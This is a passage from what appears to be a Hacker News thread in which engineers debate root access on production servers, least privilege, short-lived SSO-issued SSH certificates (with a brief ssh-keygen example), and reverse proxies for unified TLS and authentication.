This is especially true if you have programmatic access to a public cloud somewhere: you do not want any more power than necessary for any longer than necessary, because administrator access to e.g. an AWS account means that when it leaks, your infra can be automatically compromised in less time than you can react, and you can't even put firewalls in front because it's accessible from the internet.
Leave the operations that require real power to CI systems and automated processes where you have some testing and review in the middle. Get your logs and memory dumps shipped out of the system into tools that actually help you make use of them; if you need to debug a live system as root, that should be an exceptional situation that raises all kinds of alarms so that it can be formally accepted.
I'm a guy whose job involves maintaining hundreds of systems and I'm always happy when I can do it with less power.
jcrites 2021-08-18 18:28:21 +0000 UTC [ - ]
Correct, at both FAANGs I logged in as myself and had passwordless sudo. (Passwordless sudo being preferable to minimize the number of machines that have user password hashes at the company, since these can be brute-forced when employees set bad passwords.)
> your SSH key is passphrase-protected and you use an SSH agent
I don't have long-lived SSH keys. The FAANGs where I've worked use short-lived (~24h) SSH client certificates, issued by Single Sign On and a server-trusted SSH Certificate Authority, where the SSO authenticates the user via MFA (typically FIDO2 or variants with a Yubikey press). (Yes, you can indeed employ CAs with SSH and generate short-lived certificates [1].) I don't generally type my password after signing into my client machine, except possibly once more to authenticate into the corporate web framework (w/ MFA).
After that, every SSH action requires an individual MFA approval. It doesn't require a password or any SSH key protected by a password – I think long-lived SSH keys, like you'd protect with a password, are an anti-pattern, because when employees leave the company or change teams you have to remember to revoke them or update their keys. With the SSH CA approach, you simply change which certs it's willing to issue to an employee for which servers based on policy; then people who leave the company can't access the system at all. You get the right behavior by default without anyone remembering to take action during off-boarding.
No long-lived SSH keys with passwords. Short-lived SSH certificates don't need their own passwords.
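With plain OpenSSH, the core of that flow is just this (identity, principal, and file names illustrative; the Facebook write-up linked below describes the real system):

```
# The SSO-gated CA signs a certificate valid for 24h; there is no
# long-lived user key for off-boarding to forget about:
ssh-keygen -s user_ca -I alice@corp -n alice -V +24h id_ed25519.pub
# Servers trust the CA instead of individual keys, via sshd_config:
#   TrustedUserCAKeys /etc/ssh/user_ca.pub
```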
As a developer operating systems on a suite of servers, it's simply a business need for me to have SSH access to the virtual machines that I own running on those servers (not necessarily the underlying hypervisors – those are an entirely different beast).
If you were in the cloud, it's equivalent to being able to obtain an SSH certificate that allows you to log onto e.g. EC2 instances. Or if I'm on a team that's operating bare-metal instances, I can log into those.
I don't accept that root is less than necessary to do my job. When things go wrong, there are too many directions debugging can go that you cannot explore without root. Like I mentioned, without it I can't take a machine out of service, attach a debugger to it, and invoke the failing functionality. I can't change machine parameters that may fix the problem, like memory limits. You can't even examine the contents of a number of crucial logs without it.
I agree with the principle of least access and employ it in my personal systems as well. At work, I think POLA results in you having root on every machine you're responsible for.
[1] https://engineering.fb.com/2016/09/12/security/scalable-and-... (Disclosure: the FAANG I currently work for is Facebook)
chousuke 2021-08-18 20:15:09 +0000 UTC [ - ]
Having a solution like that in place goes a long way towards reducing the immediate power you have available at any one time, so I don't think we disagree much at all.
jcims 2021-08-18 06:17:50 +0000 UTC [ - ]
It all boils down to this at the end of the day. There is clearly some level of tradeoff between control and velocity, and there are valid business cases for setting the dial just about anywhere on the spectrum.
pjmlp 2021-08-18 14:14:53 +0000 UTC [ - ]
Also, even on Windows, in cloud deployments the only admin access we tend to have in production is dashboards; no one gets to touch the actual machine.
In enterprise consulting projects, with security-conscious customers, I never got an Admin account directly, only temporarily via tooling that would grant it for a couple of hours on request, and installing software required IT tickets.
arpa 2021-08-18 06:34:12 +0000 UTC [ - ]
floatingatoll 2021-08-18 06:41:35 +0000 UTC [ - ]
wging 2021-08-18 06:24:16 +0000 UTC [ - ]
How common is this case, really? I'd expect most public-facing services, even really high-scale/'special' stuff, to be instantiated inside a private network (a VPC or suchlike, scoped down to just that service if you're lucky) and not internet-accessible, fronted by public-facing load balancers listening on 80/443 that the service team doesn't need or want to control. AWS's ALBs and various equivalents definitely allow for that. In such a situation there's no need for the internal port that your service hosts listen on to match the external port (though having root on those boxes may be desirable for many other reasons).
(of course, if your public web servers are the load balancers themselves, that is different...)
pmontra 2021-08-18 07:03:50 +0000 UTC [ - ]
corty 2021-08-19 08:49:02 +0000 UTC [ - ]
- Unified TLS config and certificate deployment to your chosen common webserver. Never again having to fiddle with yet another crappy vendor configuration not knowing about anything beyond DES, Java crapping itself with larger certificates, vendors not patching TLS library problems for ages.
- Unified log format: Vendors never stick to a proper format, but everyone can read and parse apache logs. Also, easier handling through unified output to syslog/logstash/whatever.
- Unified authentication: No need to wait for all your vendors to support your orgs chosen SSO scheme. Just let your common webserver handle things and pass on some 'X-Authenticated-User: joe'. Most vendors do handle those.
- Additional authentication: Afraid of pre-auth exploits in a vendor's crappy application or whatever SQL injection in the login form some internal department concocted? Just have the proxy do an additional authentication step (e.g. negotiate/kerberos/AD auth), then unauthenticated users cannot harm you and authenticated evil users will be plainly visible in the logs.
- Fixing crap: Vendor changed the URL scheme of some webapp again? All the links from the internal wiki are broken now? Have the proxy do some regex-rewriting.
As for the various grandparents talking about whatever they did at FAANG: I don't believe it, because the above concept is (almost) the same as what e.g. Google is doing with https://cloud.google.com/beyondcorp
Ntrails 2021-08-18 07:00:49 +0000 UTC [ - ]
I managed to have local admin on my box by default for as long as I worked there and it was great.
Downloading and installing a new VS using my own MSDN. Halcyon days.
nicoburns 2021-08-18 01:13:10 +0000 UTC [ - ]
_wldu 2021-08-18 01:16:41 +0000 UTC [ - ]
npteljes 2021-08-18 17:54:15 +0000 UTC [ - ]
ithinkso 2021-08-18 07:43:13 +0000 UTC [ - ]
passivate 2021-08-19 16:20:56 +0000 UTC [ - ]
It's similar to popping up a fake authentication screen and asking the user to type their admin password.
nonameiguess 2021-08-18 00:56:07 +0000 UTC [ - ]
I can't even conceive of what a worse security hole would look like. This is unauthenticated root shell to anyone on the network. Maybe Intel Management Engine is worse since it grants privilege to run instructions and access hardware even the OS can't get to?
hermitdev 2021-08-18 02:45:23 +0000 UTC [ - ]
anyfoo 2021-08-18 03:08:13 +0000 UTC [ - ]
hermitdev 2021-08-18 03:52:49 +0000 UTC [ - ]
anyfoo 2021-08-18 02:07:03 +0000 UTC [ - ]
With newer stuff in certain configurations, something that gives you remote execution in the kernel or even lower (your Intel ME example seems like a good one) is a much worse security hole, yeah (but then this one could still be a stepping stone to the worse bug).
T3OU-736 2021-08-18 03:08:41 +0000 UTC [ - ]
SGI's IRIX could be part of a B2-level installation (because the criteria applied to more than just the OS).
So much wheel reinvention sometimes...
[1] https://en.m.wikipedia.org/wiki/Trusted_Computer_System_Eval...
Y_Y 2021-08-18 06:55:34 +0000 UTC [ - ]
anyfoo 2021-08-18 03:16:41 +0000 UTC [ - ]
I share the sentiment about the wheel reinvention, though. This will continue happening...
c3534l 2021-08-18 03:48:54 +0000 UTC [ - ]
SeriousM 2021-08-18 05:54:55 +0000 UTC [ - ]
MesSWK 2021-08-18 07:08:24 +0000 UTC [ - ]
[0] https://www.ic3.gov/Media/PDF/Y2013/PSA130918.pdf
ma2rten 2021-08-18 04:51:03 +0000 UTC [ - ]
q-rews 2021-08-18 07:21:36 +0000 UTC [ - ]
Thiez 2021-08-18 17:03:22 +0000 UTC [ - ]